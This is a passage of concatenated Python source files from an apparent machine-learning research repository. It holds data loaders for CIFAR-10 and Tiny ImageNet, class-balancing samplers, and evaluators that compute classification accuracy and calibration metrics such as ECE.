if get_val_temp > 0:
valid_temp_dataset = datasets.CIFAR10(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
split = int(np.floor(get_val_temp * split))
valid_idx, valid_temp_idx = valid_idx[split:], valid_idx[:split]
valid_temp_sampler = SubsetRandomSampler(valid_temp_idx)
valid_temp_loader = torch.utils.data.DataLoader(
valid_temp_dataset, batch_size=batch_size, sampler=valid_temp_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
sampler=train_sampler,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True
# worker_init_fn=worker_init_fn,
)
valid_loader = torch.utils.data.DataLoader(
valid_dataset,
batch_size=batch_size,
sampler=valid_sampler,
num_workers=num_workers,
pin_memory=pin_memory,
# worker_init_fn=worker_init_fn,
)
if get_val_temp > 0:
return (train_loader, valid_loader, valid_temp_loader)
else:
return (train_loader, valid_loader)
def get_test_loader(batch_size,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning a multi-process
test iterator over the CIFAR-10 dataset.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- batch_size: how many samples per batch to load.
- shuffle: whether to shuffle the dataset after every epoch.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- data_loader: test set iterator.
"""
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transform
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# data_dir = './data'
dataset = datasets.CIFAR10(
root=data_dir, train=False,
download=True, transform=transform,
)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers, pin_memory=pin_memory,
)
return data_loader
| 5,698 | Python | .py | 157 | 28.076433 | 82 | 0.624796 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,879 | sampler.py | cvlab-yonsei_RankMixup/calibrate/data/sampler.py | import numpy as np
import random
import torch
class BalancedDatasetSampler(torch.utils.data.sampler.Sampler):
def __init__(self, dataset, indices=None, num_samples=None):
# if indices is not provided,
# all elements in the dataset will be considered
self.indices = list(range(len(dataset))) \
if indices is None else indices
# if num_samples is not provided,
# draw `len(indices)` samples in each iteration
self.num_samples = len(self.indices) \
if num_samples is None else num_samples
# distribution of classes in the dataset
label_to_count = [0] * len(np.unique(dataset.targets))
for idx in self.indices:
label = self._get_label(dataset, idx)
label_to_count[label] += 1
per_cls_weights = 1 / np.array(label_to_count)
# weight for each sample
weights = [per_cls_weights[self._get_label(dataset, idx)]
for idx in self.indices]
self.weights = torch.DoubleTensor(weights)
def _get_label(self, dataset, idx):
return dataset.targets[idx]
def __iter__(self):
return iter(torch.multinomial(self.weights, self.num_samples, replacement=True).tolist())
def __len__(self):
return self.num_samples
class EffectNumSampler(torch.utils.data.sampler.Sampler):
def __init__(self, dataset, indices=None, num_samples=None):
# if indices is not provided,
# all elements in the dataset will be considered
self.indices = list(range(len(dataset))) \
if indices is None else indices
# if num_samples is not provided,
# draw `len(indices)` samples in each iteration
self.num_samples = len(self.indices) \
if num_samples is None else num_samples
# distribution of classes in the dataset
label_to_count = [0] * len(np.unique(dataset.targets))
for idx in self.indices:
label = self._get_label(dataset, idx)
label_to_count[label] += 1
beta = 0.9999
effective_num = 1.0 - np.power(beta, label_to_count)
per_cls_weights = (1.0 - beta) / np.array(effective_num)
# weight for each sample
weights = [per_cls_weights[self._get_label(dataset, idx)]
for idx in self.indices]
self.weights = torch.DoubleTensor(weights)
def _get_label(self, dataset, idx):
return dataset.targets[idx]
def __iter__(self):
return iter(torch.multinomial(self.weights, self.num_samples, replacement=True).tolist())
def __len__(self):
return self.num_samples
class RandomCycleIter:
def __init__ (self, data, test_mode=False):
self.data_list = list(data)
self.length = len(self.data_list)
self.i = self.length - 1
self.test_mode = test_mode
def __iter__ (self):
return self
def __next__ (self):
self.i += 1
if self.i == self.length:
self.i = 0
if not self.test_mode:
random.shuffle(self.data_list)
return self.data_list[self.i]
def class_aware_sample_generator(cls_iter, data_iter_list, n, num_samples_cls=1):
i = 0
j = 0
while i < n:
# yield next(data_iter_list[next(cls_iter)])
if j >= num_samples_cls:
j = 0
if j == 0:
temp_tuple = next(zip(*[data_iter_list[next(cls_iter)]]*num_samples_cls))
yield temp_tuple[j]
else:
yield temp_tuple[j]
i += 1
j += 1
class ClassAwareSampler(torch.utils.data.sampler.Sampler):
def __init__(self, data_source, num_samples_cls=4,):
# pdb.set_trace()
num_classes = len(np.unique(data_source.targets))
self.class_iter = RandomCycleIter(range(num_classes))
cls_data_list = [list() for _ in range(num_classes)]
for i, label in enumerate(data_source.targets):
cls_data_list[label].append(i)
self.data_iter_list = [RandomCycleIter(x) for x in cls_data_list]
self.num_samples = max([len(x) for x in cls_data_list]) * len(cls_data_list)
self.num_samples_cls = num_samples_cls
def __iter__ (self):
return class_aware_sample_generator(self.class_iter, self.data_iter_list,
self.num_samples, self.num_samples_cls)
def __len__ (self):
return self.num_samples
def get_sampler():
return ClassAwareSampler | 4,803 | Python | .py | 104 | 34.326923 | 97 | 0.612962 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,880 | tiny_imagenet.py | cvlab-yonsei_RankMixup/calibrate/data/tiny_imagenet.py | """
Create train, val, test iterators for Tiny ImageNet.
Train set size: 100000
Val set size: 10000
Test set size: 10000
Number of classes: 200
Link: https://tiny-imagenet.herokuapp.com/
"""
import os
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import os
import glob
from torch.utils.data import Dataset
from PIL import Image
EXTENSION = 'JPEG'
NUM_IMAGES_PER_CLASS = 500
CLASS_LIST_FILE = 'wnids.txt'
VAL_ANNOTATION_FILE = 'val_annotations.txt'
class TinyImageNet(Dataset):
"""Tiny ImageNet data set available from `http://cs231n.stanford.edu/tiny-imagenet-200.zip`.
Parameters
----------
root: string
Root directory including `train`, `test` and `val` subdirectories.
split: string
Indicating which split to return as a data set.
Valid option: [`train`, `test`, `val`]
transform: torchvision.transforms
A (series) of valid transformation(s).
in_memory: bool
Set to True if there is enough memory (about 5G) and want to minimize disk IO overhead.
"""
def __init__(self, root, split='train', transform=None, target_transform=None, in_memory=False):
self.root = os.path.expanduser(root)
self.split = split
self.transform = transform
self.target_transform = target_transform
self.in_memory = in_memory
self.split_dir = os.path.join(root, self.split)
self.image_paths = sorted(glob.iglob(os.path.join(self.split_dir, '**', '*.%s' % EXTENSION), recursive=True))
self.labels = {} # fname - label number mapping
self.images = [] # used for in-memory processing
# build class label - number mapping
with open(os.path.join(self.root, CLASS_LIST_FILE), 'r') as fp:
self.label_texts = sorted([text.strip() for text in fp.readlines()])
self.label_text_to_number = {text: i for i, text in enumerate(self.label_texts)}
if self.split == 'train':
for label_text, i in self.label_text_to_number.items():
for cnt in range(NUM_IMAGES_PER_CLASS):
self.labels['%s_%d.%s' % (label_text, cnt, EXTENSION)] = i
elif self.split == 'val':
with open(os.path.join(self.split_dir, VAL_ANNOTATION_FILE), 'r') as fp:
for line in fp.readlines():
terms = line.split('\t')
file_name, label_text = terms[0], terms[1]
self.labels[file_name] = self.label_text_to_number[label_text]
# read all images into torch tensor in memory to minimize disk IO overhead
if self.in_memory:
self.images = [self.read_image(path) for path in self.image_paths]
def __len__(self):
return len(self.image_paths)
def __getitem__(self, index):
file_path = self.image_paths[index]
if self.in_memory:
img = self.images[index]
else:
img = self.read_image(file_path)
if self.split == 'test':
return img
else:
# file_name = file_path.split('/')[-1]
return img, self.labels[os.path.basename(file_path)]
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
tmp = self.split
fmt_str += ' Split: {}\n'.format(tmp)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
def read_image(self, path):
img = Image.open(path)
if (img.mode == 'L'):
img = img.convert('RGB')
return self.transform(img) if self.transform else img
def get_data_loader(root,
batch_size,
split='train',
shuffle=True,
num_workers=4,
pin_memory=False):
"""
Utility function for loading and returning train and valid
multi-process iterators over the Tiny Imagenet dataset. A sample
9x9 grid of the images can be optionally displayed.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- root: The root directory for TinyImagenet dataset
- batch_size: how many samples per batch to load.
- split: Can be train/val/test. For train we apply the data augmentation techniques.
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- train_loader: training set iterator.
- valid_loader: validation set iterator.
"""
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
val_test_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
train_transform = transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
# load the dataset
data_dir = root
if (split == 'train'):
dataset = TinyImageNet(data_dir,
split='train',
transform=train_transform,
in_memory=True)
else:
dataset = TinyImageNet(data_dir,
split='val',
transform=val_test_transform,
in_memory=True)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size,
num_workers=num_workers, pin_memory=pin_memory, shuffle=True
)
return data_loader
def get_train_val_loader(root,
batch_size,
val_samples_per_class=50,
random_seed=1,
shuffle=True,
num_workers=4,
pin_memory=False):
np.random.seed(random_seed)
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
val_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
train_transform = transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
train_dataset = TinyImageNet(root,
split="train",
transform=train_transform,
in_memory=False)
val_dataset = TinyImageNet(root,
split="train",
transform=val_transform,
in_memory=False)
num_train = len(train_dataset)
class_indices = {}
for i in range(num_train):
file_path = train_dataset.image_paths[i]
label = train_dataset.labels[os.path.basename(file_path)]
if label not in class_indices:
class_indices[label] = []
class_indices[label].append(i)
train_indices, val_indices = [], []
for label in class_indices:
indices = class_indices[label]
if shuffle:
np.random.shuffle(indices)
train_indices.extend(indices[:-val_samples_per_class])
val_indices.extend(indices[-val_samples_per_class:])
train_sampler = SubsetRandomSampler(train_indices)
val_sampler = SubsetRandomSampler(val_indices)
train_loader = DataLoader(
train_dataset, batch_size=batch_size, sampler=train_sampler,
num_workers=num_workers, pin_memory=pin_memory
)
val_loader = DataLoader(
val_dataset, batch_size=batch_size, sampler=val_sampler,
num_workers=num_workers, pin_memory=pin_memory
)
return train_loader, val_loader
def get_test_loader(root,
batch_size,
num_workers=4,
pin_memory=False):
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
test_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
dataset = TinyImageNet(root, split="val",
transform=test_transform,
in_memory=False)
data_loader = DataLoader(
dataset, batch_size=batch_size,
num_workers=num_workers, pin_memory=pin_memory
)
return data_loader
| 9,123 | Python | .py | 226 | 30.535398 | 117 | 0.591099 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,881 | segment_calibrate_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/segment_calibrate_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import wandb
from .evaluator import DatasetEvaluator
from .metrics import ECELoss, AdaptiveECELoss, ClasswiseECELoss
from .reliability_diagram import ReliabilityDiagram
from calibrate.utils.torch_helper import to_numpy
logger = logging.getLogger(__name__)
class SegmentCalibrateEvaluator(DatasetEvaluator):
def __init__(self, num_classes, num_bins=15, ignore_index: int = -1, device="cuda:0") -> None:
self.num_classes = num_classes
self.num_bins = num_bins
self.ignore_index = ignore_index
self.device = device
self.reset()
self.nll_criterion = nn.CrossEntropyLoss().to(self.device)
self.ece_criterion = ECELoss(self.num_bins).to(self.device)
self.aece_criterion = AdaptiveECELoss(self.num_bins).to(self.device)
self.cece_criterion = ClasswiseECELoss(self.num_bins).to(self.device)
def reset(self) -> None:
self.count = []
self.nll = []
self.ece = []
self.aece = []
self.cece = []
def num_samples(self):
return sum(self.count)
def main_metric(self) -> None:
return "ece"
def update(self, logits: torch.Tensor, labels: torch.Tensor) -> None:
"""update
Args:
logits (torch.Tensor): n x num_classes
label (torch.Tensor): n x 1
"""
assert logits.shape[0] == labels.shape[0]
n, c, x, y = logits.shape
logits = torch.einsum("ncxy->nxyc", logits)
logits = logits.reshape(n * x * y, -1)
labels = labels.reshape(n * x * y)
if 0 <= self.ignore_index:
index = torch.nonzero(labels != self.ignore_index).squeeze()
logits = logits[index, :]
labels = labels[index]
# dismiss background
index = torch.nonzero(labels != 0).squeeze()
logits = logits[index, :].to(self.device)
labels = labels[index].to(self.device)
n = logits.shape[0]
self.count.append(n)
nll = self.nll_criterion(logits, labels).item()
ece = self.ece_criterion(logits, labels).item()
aece = self.aece_criterion(logits, labels).item()
cece = self.cece_criterion(logits, labels).item()
self.nll.append(nll)
self.ece.append(ece)
self.aece.append(aece)
self.cece.append(cece)
def mean_score(self, print=False, all_metric=True):
total_count = sum(self.count)
nll, ece, aece, cece = 0, 0, 0, 0
for i in range(len(self.nll)):
nll += self.nll[i] * (self.count[i] / total_count)
ece += self.ece[i] * (self.count[i] / total_count)
aece += self.aece[i] * (self.count[i] / total_count)
cece += self.cece[i] * (self.count[i] / total_count)
metric = {"nll": nll, "ece": ece, "aece": aece, "cece": cece}
columns = ["samples", "nll", "ece", "aece", "cece"]
table_data = [columns]
table_data.append(
[
total_count,
"{:.5f}".format(nll),
"{:.5f}".format(ece),
"{:.5f}".format(aece),
"{:.5f}".format(cece),
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()]
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
def plot_reliability_diagram(self):
diagram = ReliabilityDiagram(bins=25, style="curve")
probs = F.softmax(self.logits, dim=1)
fig_reliab, fig_hist = diagram.plot(to_numpy(probs), to_numpy(self.labels))
return fig_reliab, fig_hist
def save_npz(self, save_path):
np.savez(
save_path,
logits=to_numpy(self.logits),
labels=to_numpy(self.labels)
)
| 4,170 | Python | .py | 106 | 30.320755 | 99 | 0.588075 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,882 | classification_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/classification_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
from sklearn.metrics import top_k_accuracy_score, confusion_matrix
import wandb
from .evaluator import DatasetEvaluator
logger = logging.getLogger(__name__)
class ClassificationEvaluator(DatasetEvaluator):
def __init__(
self,
num_classes: int
) -> None:
self.num_classes = num_classes
def reset(self) -> None:
self.preds = None
self.labels = None
def main_metric(self) -> None:
return "acc"
def num_samples(self):
return (
self.labels.shape[0]
if self.labels is not None
else 0
)
def update(self, pred: np.ndarray, label: np.ndarray) -> float:
"""update
Args:
pred (np.ndarray): n x num_classes
label (np.ndarray): n x 1
Returns:
float: acc
"""
assert pred.shape[0] == label.shape[0]
if self.preds is None:
self.preds = pred
self.labels = label
else:
self.preds = np.concatenate((self.preds, pred), axis=0)
self.labels = np.concatenate((self.labels, label), axis=0)
pred_label = np.argmax(pred, axis=1)
acc = (pred_label == label).astype("int").sum() / label.shape[0]
# acc = top_k_accuracy_score(label, pred, k=1)
self.curr = {"acc": acc}
return acc
def curr_score(self):
return self.curr
def mean_score(self, print=False, all_metric=True):
# acc = (
# (self.preds == self.labels).astype("int").sum()
# / self.labels.shape[0]
# )
acc = top_k_accuracy_score(self.labels, self.preds, k=1)
acc_5 = top_k_accuracy_score(self.labels, self.preds, k=5)
pred_labels = np.argmax(self.preds, axis=1)
confusion = confusion_matrix(self.labels, pred_labels, normalize="true")
macc = np.diagonal(confusion).mean()
metric = {"acc": acc, "acc_5": acc_5, "macc": macc}
columns = ["samples", "acc", "acc_5", "macc"]
table_data = [columns]
table_data.append(
[
self.num_samples(),
"{:.5f}".format(acc),
"{:.5f}".format(acc_5),
"{:.5f}".format(macc)
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()], table_data
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
class LT_ClassificationEvaluator(DatasetEvaluator):
def __init__(
self,
num_classes: int
) -> None:
self.num_classes = num_classes
def reset(self) -> None:
self.preds = None
self.labels = None
self.correct = None
self.class_num = None
self.head_class_idx = None
self.med_class_idx = None
self.tail_class_idx = None
def main_metric(self) -> None:
return "acc"
def num_samples(self):
return (
self.labels.shape[0]
if self.labels is not None
else 0
)
def update(self, pred: np.ndarray, label: np.ndarray, correct, class_num,
head_class_idx, med_class_idx, tail_class_idx) -> float:
"""update
Args:
pred (np.ndarray): n x num_classes
label (np.ndarray): n x 1
Returns:
float: acc
"""
assert pred.shape[0] == label.shape[0]
if self.preds is None:
self.preds = pred
self.labels = label
self.correct = correct
self.class_num = class_num
self.head_class_idx = head_class_idx
self.med_class_idx = med_class_idx
self.tail_class_idx = tail_class_idx
else:
self.preds = np.concatenate((self.preds, pred), axis=0)
self.labels = np.concatenate((self.labels, label), axis=0)
self.correct = correct
self.class_num = class_num
pred_label = np.argmax(pred, axis=1)
acc = (pred_label == label).astype("int").sum() / label.shape[0]
# acc = top_k_accuracy_score(label, pred, k=1)
self.curr = {"acc": acc}
return acc
def curr_score(self):
return self.curr
def mean_score(self, print=False, all_metric=True):
# acc = (
# (self.preds == self.labels).astype("int").sum()
# / self.labels.shape[0]
# )
acc = top_k_accuracy_score(self.labels, self.preds, k=1)
acc_5 = top_k_accuracy_score(self.labels, self.preds, k=5)
pred_labels = np.argmax(self.preds, axis=1)
confusion = confusion_matrix(self.labels, pred_labels, normalize="true")
macc = np.diagonal(confusion).mean()
acc_classes = self.correct / self.class_num
acc_classes = np.float64(acc_classes)
head_acc = acc_classes[self.head_class_idx[0]:self.head_class_idx[1]].mean()
med_acc = acc_classes[self.med_class_idx[0]:self.med_class_idx[1]].mean()
tail_acc = acc_classes[self.tail_class_idx[0]:self.tail_class_idx[1]].mean()
metric = {"acc": acc, "acc_5": acc_5, "macc": macc, "head_acc": head_acc, "med_acc": med_acc, "tail_acc": tail_acc}
columns = ["samples", "acc", "acc_5", "macc", "head_acc", "med_acc", "tail_acc"]
table_data = [columns]
table_data.append(
[
self.num_samples(),
"{:.5f}".format(acc),
"{:.5f}".format(acc_5),
"{:.5f}".format(macc),
"{:.5f}".format(head_acc),
"{:.5f}".format(med_acc),
"{:.5f}".format(tail_acc)
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()], table_data
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
) | 6,461 | Python | .py | 174 | 27.166667 | 123 | 0.54723 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,883 | plots.py | cvlab-yonsei_RankMixup/calibrate/evaluation/plots.py | '''
This file contains method for generating calibration related plots, eg. reliability plots.
References:
[1] C. Guo, G. Pleiss, Y. Sun, and K. Q. Weinberger. On calibration of modern neural networks.
arXiv preprint arXiv:1706.04599, 2017.
'''
import math
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size': 20})
# Some keys used for the following dictionaries
COUNT = 'count'
CONF = 'conf'
ACC = 'acc'
BIN_ACC = 'bin_acc'
BIN_CONF = 'bin_conf'
def _bin_initializer(bin_dict, num_bins=10):
for i in range(num_bins):
bin_dict[i][COUNT] = 0
bin_dict[i][CONF] = 0
bin_dict[i][ACC] = 0
bin_dict[i][BIN_ACC] = 0
bin_dict[i][BIN_CONF] = 0
def _populate_bins(confs, preds, labels, num_bins=10):
bin_dict = {}
for i in range(num_bins):
bin_dict[i] = {}
_bin_initializer(bin_dict, num_bins)
num_test_samples = len(confs)
for i in range(0, num_test_samples):
confidence = confs[i]
prediction = preds[i]
label = labels[i]
binn = int(math.ceil(((num_bins * confidence) - 1)))
bin_dict[binn][COUNT] = bin_dict[binn][COUNT] + 1
bin_dict[binn][CONF] = bin_dict[binn][CONF] + confidence
bin_dict[binn][ACC] = bin_dict[binn][ACC] + \
(1 if (label == prediction) else 0)
for binn in range(0, num_bins):
if (bin_dict[binn][COUNT] == 0):
bin_dict[binn][BIN_ACC] = 0
bin_dict[binn][BIN_CONF] = 0
else:
bin_dict[binn][BIN_ACC] = float(
bin_dict[binn][ACC]) / bin_dict[binn][COUNT]
bin_dict[binn][BIN_CONF] = bin_dict[binn][CONF] / \
float(bin_dict[binn][COUNT])
return bin_dict
def reliability_plot(confs, preds, labels, num_bins=15):
'''
Method to draw a reliability plot from a model's predictions and confidences.
'''
bin_dict = _populate_bins(confs, preds, labels, num_bins)
bns = [(i / float(num_bins)) for i in range(num_bins)]
y = []
for i in range(num_bins):
y.append(bin_dict[i][BIN_ACC])
plt.figure(figsize=(10, 8)) # width:20, height:3
plt.bar(bns, bns, align='edge', width=0.05, color='pink', label='Expected')
plt.bar(bns, y, align='edge', width=0.05,
color='blue', alpha=0.5, label='Actual')
plt.ylabel('Accuracy')
plt.xlabel('Confidence')
plt.legend()
plt.show()
def bin_strength_plot(confs, preds, labels, num_bins=15):
'''
Method to draw a plot for the number of samples in each confidence bin.
'''
bin_dict = _populate_bins(confs, preds, labels, num_bins)
bns = [(i / float(num_bins)) for i in range(num_bins)]
num_samples = len(labels)
y = []
for i in range(num_bins):
n = (bin_dict[i][COUNT] / float(num_samples)) * 100
y.append(n)
plt.figure(figsize=(10, 8)) # width:20, height:3
plt.bar(bns, y, align='edge', width=0.05,
color='blue', alpha=0.5, label='Percentage samples')
plt.ylabel('Percentage of samples')
plt.xlabel('Confidence')
plt.show()
def multi_class_roc(y_true, y_score):
n_class = y_score.shape[1]
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
| 3,397 | Python | .py | 90 | 31.644444 | 94 | 0.60723 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,884 | logits_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/logits_evaluator.py | import numpy as np
from .evaluator import DatasetEvaluator
class LogitsEvaluator(DatasetEvaluator):
"""get logit differences
mean_diff : (max value of logits - value of logits).mean()
max_diff : (max value of logits - value of logits).max()
margin : max value of logits - second max value of logits
Args:
DatasetEvaluator ([type]): [description]
"""
def __init__(self) -> None:
self.reset()
def reset(self) -> None:
self.count = 0
self.mean_diffs = []
self.max_diffs = []
self.margins = []
def num_samples(self):
return self.count
def main_metric(self):
return "mean_diffs"
def update(self, logits: np.ndarray):
n = logits.shape[0]
self.count += n
sort_inds = np.argsort(logits, axis=1)
max_values = np.zeros(n)
second_max_values = np.zeros(n)
min_values = np.zeros(n)
for i in range(n):
max_values[i] = logits[i, sort_inds[i, -1]]
second_max_values[i] = logits[i, sort_inds[i, -2]]
min_values[i] = logits[i, sort_inds[i, 0]]
# max_values = logits[:, sort_inds[:, -1]]
# second_max_values = logits[:, sort_inds[:, -2]]
diffs = np.repeat(max_values.reshape(n, 1), logits.shape[1], axis=1) - logits
# self.mean_diffs.append(diffs.sum())
self.mean_diffs.append(np.sum(diffs, axis=1) / (logits.shape[1] - 1))
self.max_diffs.append(np.max(diffs, axis=1))
margins = max_values - second_max_values
self.margins.append(margins)
return np.mean(self.mean_diffs[-1])
def curr_score(self):
return {
self.main_metric(): np.mean(self.mean_diffs[-1])
}
def mean_score(self, all_metric=True):
mean_diffs = np.concatenate(self.mean_diffs)
max_diffs = np.concatenate(self.max_diffs)
margins = np.concatenate(self.margins)
if not all_metric:
return np.mean(self.mean_diffs)
metric = {}
metric["mean_diffs"] = np.mean(mean_diffs)
metric["max_diffs"] = np.mean(max_diffs)
metric["margin"] = np.mean(margins)
return metric
| 2,210 | Python | .py | 56 | 31.160714 | 85 | 0.593545 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,885 | calibrate_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/calibrate_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import wandb
from .evaluator import DatasetEvaluator
from .metrics import ECELoss, AdaptiveECELoss, ClasswiseECELoss, OELoss, UELoss
from .reliability_diagram import ReliabilityDiagram
from calibrate.utils.torch_helper import to_numpy
logger = logging.getLogger(__name__)
class CalibrateEvaluator(DatasetEvaluator):
def __init__(self, num_classes, num_bins=15, device="cuda:0") -> None:
self.num_classes = num_classes
self.num_bins = num_bins
self.device = device
self.reset()
def reset(self) -> None:
self.logits = None
self.labels = None
def num_samples(self):
return (
self.labels.shape[0]
if self.labels is not None
else 0
)
def main_metric(self) -> None:
return "ece"
def update(self, logits: torch.Tensor, labels: torch.Tensor) -> None:
"""update
Args:
logits (torch.Tensor): n x num_classes
label (torch.Tensor): n x 1
"""
assert logits.shape[0] == labels.shape[0]
if self.logits is None:
self.logits = logits
self.labels = labels
else:
self.logits = torch.cat((self.logits, logits), dim=0)
self.labels = torch.cat((self.labels, labels), dim=0)
def mean_score(self, print=False, all_metric=True):
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss(self.num_bins).to(self.device)
aece_criterion = AdaptiveECELoss(self.num_bins).to(self.device)
cece_criterion = ClasswiseECELoss(self.num_bins).to(self.device)
oe_criterion = OELoss(self.num_bins).to(self.device)
ue_criterion = UELoss(self.num_bins).to(self.device)
nll = nll_criterion(self.logits, self.labels).item()
ece = ece_criterion(self.logits, self.labels).item()
aece = aece_criterion(self.logits, self.labels).item()
cece = cece_criterion(self.logits, self.labels).item()
oe = oe_criterion(self.logits, self.labels).item()
ue = ue_criterion(self.logits, self.labels).item()
# metric = {"nll": nll, "ece": ece, "aece": aece, "cece": cece}
metric = {"nll": nll, "ece": ece, "aece": aece, "cece": cece, "oe": oe, "ue": ue}
# columns = ["samples", "nll", "ece", "aece", "cece"]
columns = ["samples", "nll", "ece", "aece", "cece", "oe", "ue"]
table_data = [columns]
# table_data.append(
# [
# self.num_samples(),
# "{:.5f}".format(nll),
# "{:.5f}".format(ece),
# "{:.5f}".format(aece),
# "{:.5f}".format(cece),
# ]
# )
table_data.append(
[
self.num_samples(),
"{:.5f}".format(nll),
"{:.5f}".format(ece),
"{:.5f}".format(aece),
"{:.5f}".format(cece),
"{:.5f}".format(oe),
"{:.5f}".format(ue),
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()]
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
def plot_reliability_diagram(self, title=""):
diagram = ReliabilityDiagram(bins=25, style="curve")
probs = F.softmax(self.logits, dim=1)
fig_reliab, fig_hist = diagram.plot(
to_numpy(probs), to_numpy(self.labels),
title_suffix=title
)
return fig_reliab, fig_hist
def save_npz(self, save_path):
np.savez(
save_path,
logits=to_numpy(self.logits),
labels=to_numpy(self.labels)
)
| 4,116 | Python | .py | 107 | 29.261682 | 89 | 0.565773 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,886 | metrics.py | cvlab-yonsei_RankMixup/calibrate/evaluation/metrics.py | '''
Metrics to measure calibration of a trained deep neural network.
References:
[1] C. Guo, G. Pleiss, Y. Sun, and K. Q. Weinberger. On calibration of modern neural networks.
arXiv preprint arXiv:1706.04599, 2017.
'''
import math
import torch
import numpy as np
from torch import nn
from torch.nn import functional as F
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
# Some keys used for the following dictionaries
COUNT = 'count'
CONF = 'conf'
ACC = 'acc'
BIN_ACC = 'bin_acc'
BIN_CONF = 'bin_conf'
def _bin_initializer(bin_dict, num_bins=10):
for i in range(num_bins):
bin_dict[i][COUNT] = 0
bin_dict[i][CONF] = 0
bin_dict[i][ACC] = 0
bin_dict[i][BIN_ACC] = 0
bin_dict[i][BIN_CONF] = 0
def _populate_bins(confs, preds, labels, num_bins=10):
bin_dict = {}
for i in range(num_bins):
